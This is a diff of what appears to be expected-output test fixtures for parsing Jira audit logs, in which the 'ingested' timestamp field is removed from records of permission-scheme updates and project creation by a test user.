 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Administer Projects\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":184000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4073,7 +4017,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169974467Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Move Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":187000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4143,7 +4086,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169975263Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Schedule Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":190000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4213,7 +4155,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169975988Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Modify Reporter\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":204000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4288,7 +4229,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169976750Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Voters and Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":208000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4358,7 +4298,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169977477Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Watchers\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":210000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4433,7 +4372,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169978281Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":212000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4508,7 +4446,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169979028Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":215000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4578,7 +4515,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169979766Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":217000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4653,7 +4589,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169980492Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Comments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":219000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4723,7 +4658,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169981240Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":221000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4798,7 +4732,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169982037Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Attachments\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":223000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4868,7 +4801,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169982878Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":225000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -4938,7 +4870,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169983677Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":227000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5013,7 +4944,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169984414Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete Own Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":229000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5083,7 +5013,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169985168Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Delete All Worklogs\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Project Role\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.value\",\"key\":\"Value\",\"to\":\"Administrators\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":231000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5158,7 +5087,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169985913Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Read-Only Workflow\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":233000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5228,7 +5156,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169986640Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Transition Issues\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":235000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5298,7 +5225,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169987372Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"View Development Tools\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":236000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5368,7 +5294,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169988217Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Manage Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":239000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5438,7 +5363,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169988949Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Start/Complete Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":241000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5508,7 +5432,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.updated",
- "ingested": "2021-12-24T00:58:20.169989685Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme updated\",\"actionI18nKey\":\"jira.auditing.permission.scheme.updated\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"from\":\"\",\"i18nKey\":\"admin.common.words.permission\",\"key\":\"Permission\",\"to\":\"Edit Sprints\"},{\"from\":\"\",\"i18nKey\":\"admin.common.words.type\",\"key\":\"Type\",\"to\":\"Application access\"}],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":243000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5590,7 +5513,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.removed.from.project",
- "ingested": "2021-12-24T00:58:20.169990436Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"0\",\"name\":\"Default Permission Scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme removed from project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.removed.from.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"175.16.199.1\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":249000000},\"version\":\"1.0\"}",
 "type": [
 "deletion"
@@ -5659,7 +5581,6 @@
 },
 "event": {
 "action": "jira.auditing.permission.scheme.added.to.project",
- "ingested": "2021-12-24T00:58:20.169991165Z",
 "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"10000\",\"name\":\"Default software scheme\",\"type\":\"SCHEME\"}],\"auditType\":{\"action\":\"Permission scheme added to project\",\"actionI18nKey\":\"jira.auditing.permission.scheme.added.to.project\",\"area\":\"PERMISSIONS\",\"category\":\"permissions\",\"categoryI18nKey\":\"jira.auditing.category.permissions\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[],\"extraAttributes\":[],\"method\":\"Browser\",\"source\":\"10.50.33.72\",\"system\":\"http://jira.internal:8088\",\"timestamp\":{\"epochSecond\":1637539714,\"nano\":266000000},\"version\":\"1.0\"}",
 "type": "info",
 "kind": "event"
@@ -5722,7 +5643,6 @@ }, "event": { "action": "jira.auditing.project.created", - "ingested": "2021-12-24T00:58:20.169991897Z", "original": "{\"affectedObjects\":[{\"id\":\"10000\",\"name\":\"test\",\"type\":\"PROJECT\"},{\"id\":\"JIRAUSER10000\",\"name\":\"test.user\",\"type\":\"USER\"}],\"auditType\":{\"action\":\"Project created\",\"actionI18nKey\":\"jira.auditing.project.created\",\"area\":\"LOCAL_CONFIG_AND_ADMINISTRATION\",\"category\":\"projects\",\"categoryI18nKey\":\"jira.auditing.category.projects\",\"level\":\"BASE\"},\"author\":{\"id\":\"10000\",\"name\":\"test.user\",\"type\":\"ApplicationUser\",\"uri\":\"/secure/ViewProfile.jspa?name=test.user\"},\"changedValues\":[{\"i18nKey\":\"common.words.name\",\"key\":\"Name\",\"to\":\"test\"},{\"i18nKey\":\"common.words.key\",\"key\":\"Key\",\"to\":\"TEST\"},{\"i18nKey\":\"common.concepts.description\",\"key\":\"Description\",\"to\":\"\"},{\"i18nKey\":\"common.concepts.projectlead\",\"key\":\"Project Lead\",\"to\":\"test.user\"},{\"i18nKey\":\"admin.projects.default.assignee\",\"key\":\"Default 